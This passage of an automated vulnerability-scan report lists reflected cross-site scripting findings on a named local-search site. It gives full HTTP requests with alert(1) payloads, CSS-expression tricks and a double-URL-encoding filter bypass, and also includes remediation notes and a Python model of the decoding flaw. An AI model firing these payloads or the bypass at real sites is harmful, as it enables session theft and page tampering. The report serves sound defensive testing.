This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated only by older IE rendering modes) and may not work on other browsers. Since the echoed payload shows that a double quote and an equals sign pass through unencoded, check manually whether an event-handler attribute is also accepted at the same injection point, which would not depend on the browser.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the l request parameter, as the web server will already have carried out one decode; the second decode is what turns the %22, %3e and %3c that passed the filter back into a quote and angle brackets. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value at the point where it is written into the attribute rather than relying on a character blacklist.
The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated only by older IE rendering modes) and may not work on other browsers. Since the echoed payload shows that a double quote and an equals sign pass through unencoded, check manually whether an event-handler attribute is also accepted at the same injection point, which would not depend on the browser.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated only by older IE rendering modes) and may not work on other browsers. Since the echoed payload shows that a double quote and an equals sign pass through unencoded, check manually whether an event-handler attribute is also accepted at the same injection point, which would not depend on the browser.
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated only by older IE rendering modes) and may not work on other browsers. Since the echoed payload shows that a double quote and an equals sign pass through unencoded, check manually whether an event-handler attribute is also accepted at the same injection point, which would not depend on the browser.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated only by older IE rendering modes) and may not work on other browsers. Since the echoed payload shows that a double quote and an equals sign pass through unencoded, check manually whether an event-handler attribute is also accepted at the same injection point, which would not depend on the browser.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated only by older IE rendering modes) and may not work on other browsers. Since the echoed payload shows that a double quote and an equals sign pass through unencoded, check manually whether an event-handler attribute is also accepted at the same injection point, which would not depend on the browser.
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter, as the web server will already have carried out one decode; the second decode is what turns the %27 and %3b that passed the filter back into a quote and a semicolon. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and, if the value must be placed in a script block, escape it for a JavaScript string literal at the point of output rather than relying on a character blacklist.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062
The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the zone request parameter, as the web server will already have carried out one decode; the second decode is what turns the %22, %3e and %3c that passed the filter back into a quote and angle brackets. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value at the point where it is written into the attribute rather than relying on a character blacklist.
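The double-decoding sequence described in the cat, l and zone findings above, as an added Python model that is not part of the report: a blacklist applied to the once-decoded value, a second URL-decode inside the application, and the result written into a double-quoted attribute. The blacklist, the hidden-input markup and the function names are assumptions; the payload and marker are taken from the cat attribute finding. The hardened variants follow the remediation note: decode once only, or validate after canonicalisation, and in both cases encode for the attribute context at output.

```python
from html import escape
from typing import Optional
from urllib.parse import unquote

# Characters the modelled blacklist rejects (constructed for this example).
BLOCKED = set('<>"\'')


def server_decode(raw_value: str) -> str:
    """The single URL-decode the web server performs before the application runs."""
    return unquote(raw_value)


def passes_blacklist(value: str) -> bool:
    return not any(ch in BLOCKED for ch in value)


def app_canonicalise(value: str) -> str:
    """The application's own second URL-decode: the step that reintroduces the
    characters the blacklist has already cleared."""
    return unquote(value)


def render_vulnerable(raw_value: str) -> Optional[str]:
    """Validate, then decode again, then write raw into a double-quoted attribute."""
    once = server_decode(raw_value)
    if not passes_blacklist(once):
        return None                      # request rejected by the filter
    twice = app_canonicalise(once)
    return f'<input type="hidden" name="cat" value="{twice}">'


def render_hardened(raw_value: str) -> Optional[str]:
    """Decode once only, validate after all decoding, encode for the context."""
    value = server_decode(raw_value)
    if not passes_blacklist(value):
        return None
    return f'<input type="hidden" name="cat" value="{escape(value, quote=True)}">'


def render_validate_after_canonicalise(raw_value: str) -> Optional[str]:
    """If the second decode has to stay, validation must run after it."""
    value = app_canonicalise(server_decode(raw_value))
    if not passes_blacklist(value):
        return None
    return f'<input type="hidden" name="cat" value="{escape(value, quote=True)}">'


def injected(html_out: Optional[str], marker: str) -> bool:
    """True if the attribute was closed and a live <script> element with the
    scanner's marker is present in the rendered output."""
    return html_out is not None and f'"><script>alert(1)</script>{marker}' in html_out


# Payload from the cat attribute finding, exactly as it appeared in the URL,
# and its single-encoded form for comparison.
DOUBLE_ENCODED = "14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1"
SINGLE_ENCODED = "14aca%22%3e%3cscript%3ealert%281%29%3c%2fscript%3ee268f1e14c1"
MARKER = "e268f1e14c1"


if __name__ == "__main__":
    print("single-encoded, vulnerable:", render_vulnerable(SINGLE_ENCODED))
    print("double-encoded, vulnerable:", render_vulnerable(DOUBLE_ENCODED))
    print("double-encoded, hardened:  ", render_hardened(DOUBLE_ENCODED))
    print("double-encoded, validated after canonicalisation:",
          render_validate_after_canonicalise(DOUBLE_ENCODED))
```

The single-encoded payload is rejected by the blacklist, which is why the scanner had to double-encode; the double-encoded one sails through the check and is then decoded into a live script tag. The first hardened variant never sees a `<` because it never decodes twice, and the second rejects the request because it validates the fully decoded value.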
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107
1.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/music/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
1.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/performing-arts/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Theatre and Comedy Eve ...[SNIP]... <a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);"> ...[SNIP]...
1.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/sports/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
